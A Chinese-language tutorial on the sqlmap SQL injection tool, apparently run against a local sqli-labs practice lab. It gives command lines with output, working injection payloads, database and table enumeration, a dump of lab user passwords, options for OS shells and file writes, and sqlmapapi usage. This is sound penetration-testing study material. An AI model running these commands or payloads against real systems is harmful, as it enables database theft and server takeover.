SQL注入-sqlmap使用

sqlmap简介

一款自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

Sqlmap安装

官网地址：https://sqlmap.org/
github地址：https://github.com/sqlmapproject/sqlmap
下载解压后，在当前路径下打开cmd界面
输入python sqlmap.py -h
1. 如果有显示帮助参数信息，表示可以直接使用。

E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -h
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
......

参数介绍

参数	说明
-u	目标URL
-d	连接数据库
–dbs	列出所有的数据库
–current-db	列出当前的数据库
–tables	列出当前的表
–columns	列出当前的列
-D	选择使用哪个数据库
-T	选择使用哪个表
-C	选择使用哪个列
–dump	获取字段中的数据
–dump-all	拖库
–batch	自动选择Yes
–smart	快速判断（扫得快）
–forms	尝试post注入
-r	加载文件中的HTTP请求（本地保存的请求包txt文件）
-l	加载文件中的HTTP请求（本地保存的请求包日志文件）
-g	自动获取Google搜索的前一百个结果，对GET参数的URL测试
-o	开启所有默认性优化
–tamper	调佣脚本进行注入
-v	显示提示信息 [0-6]级，默认为1
–delay	设置多久访问一次
–os-shell	获取主机shell
-m	批量操作
-c	制定配置文件
-data	data指定的数据会当做post数据提交
-timeout	设置超时时间
–technique	盲注选择（当你知道注入的类型是盲注，可以选择） B：布尔型 E:报错型 U：联合型 S：（二次注入）读取系统文件等等 T:时间延迟注入
–is-dba	判断是否是root权限
–users	所有数据库用户
–current-user	当前数据库用户
–proxy http://localhost:8080	添加代理
–threads 10	并发数
–sql-shell	交互式sql的shell
-level	[1-5]级，级别越高越详细
–os-shell	交互式的操作系统的shell
–file-read	读取文件
–file-write	写入文件
–file-dest	写入到网站的绝对路径

示例

Less-1

查询基本信息和注入点

# 命令：python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1"
# 得到结果:
# 系统参数
# web server operating system: Windows
# web application technology: Apache 2.4.23, PHP 5.4.45
# back-end DBMS: MySQL >= 5.0
# 


E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:19:09 /2024-06-19/

[16:19:10] [INFO] resuming back-end DBMS 'mysql'
[16:19:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3438=3438 AND 'OtUZ'='OtUZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9482 FROM(SELECT COUNT(*),CONCAT(0x71716a6271,(SELECT (ELT(9482=9482,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMvu'='pMvu

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1079 FROM (SELECT(SLEEP(5)))favz) AND 'rGAe'='rGAe
---
[16:19:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[16:19:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\10.196.93.67'

[*] ending @ 16:19:12 /2024-06-19/

查询服务器所有数据库

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" --dbs

# 结果
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" --dbs



available databases [8]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] test

查询security数据库中的所有表

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" --tables
# 结果：

E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" --tables

[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

查询users表中的数据

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" -T  "users" --dump

# 结果
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" -D "security" -T  "users" --dump

[16 entries]
+----+------------+----------------------+
| id | password   | username             |
+----+------------+----------------------+
| 1  | Dumb       | Dumb                 |
| 2  | I-kill-you | Angelina             |
| 3  | p@ssword   | Dummy                |
| 4  | crappy     | secure               |
| 5  | stupidity  | stupid               |
| 6  | genious    | superman             |
| 7  | mob!le     | batman               |
| 8  | admin      | admin                |
| 9  | admin1     | admin1               |
| 10 | admin2     | admin2               |
| 11 | admin3     | admin3               |
| 12 | dumbo      | dhakkan              |
| 14 | admin4     | admin4               |
| 22 | e          | a                    |
| 33 | v          | v                    |
| 34 | 123456     | v'union select 1,use |
+----+------------+----------------------+

Less-2

默认选择Yes

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-2/?id=1" --batch

快速扫描

# python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1" --batch --smart
        ___

E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-1/?id=1" --batch --smart
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:19:50 /2024-06-20/

[08:19:50] [INFO] resuming back-end DBMS 'mysql'
[08:19:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3438=3438 AND 'OtUZ'='OtUZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9482 FROM(SELECT COUNT(*),CONCAT(0x71716a6271,(SELECT (ELT(9482=9482,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMvu'='pMvu

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1079 FROM (SELECT(SLEEP(5)))favz) AND 'rGAe'='rGAe
---
[08:19:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[08:19:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\10.196.93.67'

Less-11

尝试POST注入

# python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-11" --forms
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-11" --forms
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:24:09 /2024-06-20/

[08:24:09] [INFO] testing connection to the target URL
got a 301 redirect to 'http://10.196.93.67/sqli-labs/Less-11/'. Do you want to follow? [Y/n] y
[08:24:13] [INFO] searching for forms
[1/1] Form:
POST http://10.196.93.67/sqli-labs/Less-11
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected): uname=33&passwd=333&submit=Submit
......

通过请求包的方式注入
1. 使用抓包工具找到需要注入的请求，再需要注入的参数后面添加*号，并保存到本地的txt文件中。

POST /sqli-labs/Less-11/ HTTP/1.1
Host: 10.196.93.67
Content-Length: 32
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.196.93.67
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.196.93.67/sqli-labs/Less-11/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9a1nmutffn2ucra7rlo7b0vaq1
Connection: keep-alive

uname=aa*&passwd=aa*&submit=Submit

执行语句

# python sqlmap.py -r ./texts/less11.txt


E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmap.py -r ./texts/less11.txt
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.6.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:32:35 /2024-06-20/

[08:32:35] [INFO] parsing HTTP request from './texts/less11.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
......

指定data数据

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-11" --data=“uname=1*&passwd=1*”

Less-8

布尔盲注

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-8" --technique B

Less-9

时间盲注

python sqlmap.py -u "http://10.196.93.67/sqli-labs/Less-9" --technique T

写入文件到网站目录中

一句话木马

sqlmapApi

一、连接

参数

运行

# 通过cmd窗口执行sqlmapap.py文件
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmapapi.py
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Run as a REST-JSON API server
  -c, --client          Run as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")
  --database=DATABASE   Set IPC database filepath (optional)
  --username=USERNAME   Basic authentication username (optional)
  --password=PASSWORD   Basic authentication password (optional)

E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>

开启服务
1. 方式一（默认）

# python  sqlmapapi.py -s
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmapapi.py -s
[09:31:57] [INFO] Running REST-JSON API server at '127.0.0.1:8775'..
[09:31:57] [INFO] Admin (secret) token: cac6ad6380a7cb62254ceecfd2656ee8
[09:31:57] [DEBUG] IPC database: 'C:\Users\ADMINI~1\AppData\Local\Temp\sqlmapipc-_tai1v4v'
[09:31:57] [DEBUG] REST-JSON API server connected to IPC database
[09:31:57] [DEBUG] Using adapter 'wsgiref' to run bottle

方式二：指定ip和端口

# python sqlmapapi.py -s -H "10.196.93.66" -p 10005
  
E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6>python sqlmapapi.py -s -H "10.196.93.66" -p 10005
[09:35:11] [INFO] Running REST-JSON API server at '10.196.93.66:10005'..
[09:35:11] [INFO] Admin (secret) token: f4aaa71f7e1e90a807cdb69d4efa4ffd
[09:35:11] [DEBUG] IPC database: 'C:\Users\ADMINI~1\AppData\Local\Temp\sqlmapipc-594mghoc'
[09:35:11] [DEBUG] REST-JSON API server connected to IPC database
[09:35:11] [DEBUG] Using adapter 'wsgiref' to run bott

客户端连接

# python E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6\sqlmapapi.py -c -p 10005 -H "10.196.93.66"


C:\>python E:\permeate\tools\sqlmap-1.8.6\sqlmap-1.8.6\sqlmapapi.py -c -p 10005 -H "10.196.93.66"
[09:41:30] [DEBUG] Example client access from command line:
        $ taskid=$(curl http://10.196.93.66:10005/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid
        $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://10.196.93.66:10005/scan/$taskid/start
        $ curl http://10.196.93.66:10005/scan/$taskid/data
        $ curl http://10.196.93.66:10005/scan/$taskid/log
[09:41:30] [INFO] Starting REST-JSON API client to 'http://10.196.93.66:10005'...
[09:41:30] [DEBUG] Calling 'http://10.196.93.66:10005'
[09:41:30] [INFO] Type 'help' or '?' for list of available commands
api>

二、基本操作

帮助信息

# help
api> help
help           Show this help message
new ARGS       Start a new scan task with provided arguments (e.g. '[37mnew -u "http://testphp.vulnweb.com/artists.php?artist=1"[0m')
use TASKID     Switch current context to different task (e.g. '[37muse c04d8c5c7582efb4[0m')
data           Retrieve and show data for current task
log            Retrieve and show log for current task
status         Retrieve and show status for current task
option OPTION  Retrieve and show option for current task
options        Retrieve and show all options for current task
stop           Stop current task
kill           Kill current task
list           Display all tasks
version        Fetch server version
flush          Flush tasks (delete all tasks)
exit           Exit this client
api>

新建扫描对象

# Less-1
# 命令：new -u "http://10.196.93.67/sqli-labs/Less-1/? id=1"
# 扫描任务的编号 ：0fa3537a1438b002
# 可以对多个任务进行扫描，通过ID号区分
api> new -u "http://10.196.93.67/sqli-labs/Less-1/? id=1"
[09:48:05] [DEBUG] Calling 'http://10.196.93.66:10005/task/new'
[09:48:05] [INFO] New task ID is '0fa3537a1438b002'
[09:48:05] [DEBUG] Calling 'http://10.196.93.66:10005/scan/0fa3537a1438b002/start'
[09:48:05] [INFO] Scanning started
api ([31m0fa3537a1438b002[0m)>

查看扫描任务列表

# 命令：list
# 当前任务数：2
# 标志为terminated表示扫描完成
# 标志为running表示正在扫描

api ([96mfc4886ebf0b41d37[0m)> list
[09:51:03] [DEBUG] Calling 'http://10.196.93.66:10005/admin/list'
{
    "success": true,
    "tasks": {
        "0fa3537a1438b002": "terminated",
        "fc4886ebf0b41d37": "running"
    },
    "tasks_num": 2
}

切换任务

# 命令： use + id

api ([35mca38f40e2b20260f[0m)> list
[09:57:02] [DEBUG] Calling 'http://10.196.93.66:10005/admin/list'
{
    "success": true,
    "tasks": {
        "0fa3537a1438b002": "terminated",
        "fc4886ebf0b41d37": "terminated",
        "ca38f40e2b20260f": "running"
    },
    "tasks_num": 3
}
api ([35mca38f40e2b20260f[0m)> use 0fa3537a1438b002
[09:57:13] [INFO] Switching to task ID '0fa3537a1438b002'
api ([31m0fa3537a1438b002[0m)>

判断是否存在注入

# 命令：data
# 如果在返回数据中的第二个data中有数据的话，表示存在注入

不存在注入

查询MySQL存在数据库

 new -u "http://10.196.93.67/sqli-labs/Less-1/? id=1" --dbs

注意：查看返回结果也可以将data中url复制到JSON可视化工具中，方便查看。

扩展

SQL注入自动化其他工具

Pangolin(穿山甲)

pangolin是一款帮助渗透测试人员进行sql注入（sql injeciton)测试的安全工具。pangolin与jsky(web应用安全漏洞扫描器，v web应用安全评估工具）都是nosec公司的产品。pangolin具备友好的图形界面以及支持测试几乎所有数据库（access,mssql,mysql,oracle.informix,db2,sybase.postgresql.sqlite).pangolin能够通过一系列非常简单的操作，达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。pangolin是目前国内使用率最高的sql注入测试的安全软件。